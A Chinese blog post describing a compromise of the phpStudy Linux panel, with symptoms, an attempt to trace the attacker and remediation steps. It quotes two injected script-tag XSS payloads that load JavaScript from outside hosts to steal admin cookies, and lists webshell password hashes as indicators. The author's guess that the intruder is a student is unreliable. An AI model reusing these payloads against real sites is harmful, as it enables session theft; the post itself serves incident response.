phpstudy-linux您修改了面板程序，这是不允许的 请进入服务器命令行输入xp查看修复方法 +解决方法

开头序言：

执行命令

/usr/local/phpstudy/tmp/repair_X1.29: line 22: unexpected EOF while looking for matching `"'

/usr/local/phpstudy/tmp/repair_X1.29: line 23: syntax error: unexpected end of file

不能修复  当你看到这些时候的说明你确实是成功被入侵了可能还被植入了webshell

           月初的时候好几台服务器无缘被入侵，有香港ip登陆，还插入了恶意代码还有js获取后台的密码，我度娘了一下 好像很多都被成功入侵了，没办法自己解决吧，vps是centos 7.3 7.6 7.9这几个版本先分析一下吧

问题

第一 ：有的人被挖矿里，因为我处理及时没有看到有挖矿文件

第二 服务器被加入了其他用户，登陆地址是香港 

第三 服务器加的js 日志有显示看到  还在task加入了

[<script src=http://216.83.XX.15/r.js></script>]登录系统失败

[<script src="http://xss.XXXX.com/myjs/cookie.js"></script>]登录系统失败

这个什么意思相信不用我说了大家都明白干啥的 IP地址是香港 电讯盈科数据中心

我们来分析这通过这些信息来工程学 追踪一下这个人能不能追踪到

端口这些就不用说了直接开了80  8080 3306

http://216.83.XX.15:8080 居然是 HFS

这些文件都看了不知道为啥搞那么多的IP

没啥用  通过IP查到这个域名一分析 时间这么长了这个域名绑定过这个IP应该是以前用户买的vps到期了

 不管度娘还是so也最后都没有啥结果，当要放弃的时候峰回路转的大bing给出了一个惊喜请看下图

 在来一张更惊喜的图

啥也别说之前蹲点没有找到，居然大bing给了一点惊喜，哥们虽然你删除了这个但是这个快照给保留了， 分析一下 从这个应该如果没有猜错的话这个学生的可能性比较大，为什么出现这个，因为学校老师布置作业之后需要截图保留发给老师，让搭建靶场必须截图保留，还有就是 web累了来读一首诗吧 说明他应该刚刚做完一件值得自己吹NB的事情还666，估计看到浏览者几个页面了，直接删除了，估计这哥们自己应该也察觉到了，我感觉就是这个，在大学里面信息安全班都是简称信安还是2班，这很符合我们的国情也很有特色，如果他的老师看到我发的这篇文章会不会抓紧找这位同学聊聊，用李云龙的话你TMD真是一个人才，剩下的在查也没啥意思了，知道是国人就行了，就算找到又有何意义呢

直接出解决方案：

第一 检查你的用户名passwd这个文件里面看看有没有异常抓紧删除那个用户

第二        很重要奥！记住奥一定都全部停止，备份！切记！ 我是直接覆盖，备份文件要养成习惯

自己手动下载 https://backups.xp.cn/V1.29/web.tar.xz这个修复文件

然后/usr/local/phpstudy/web覆盖就行，然后在输入xp   1 启动

在你的前台登陆XXXX:9080是不是很完美就进去了 没有完呢，如果不行清理一下缓存就OK

第三  被植入挖矿的用这个查看  top查看异常进程 ll -a /proc/PID 查看异常进程执行文件位置

第四 用find 找vip.php  Util.php  文件内有 $password = "ee9ecdade2b5d0caf28ef0a6b7c11520";

$password = "4a40e01e278853d0abddb12057ac38f3"; 

直接删除就行了

第五 最后查端口检查一下 rc.local 这个文件

       原创不易且行且珍惜，如果有什么不对的地方可以T我V：fanshengguanyue

宝塔服务器面板，一键全能部署及管理，送你3188元礼包，点我领取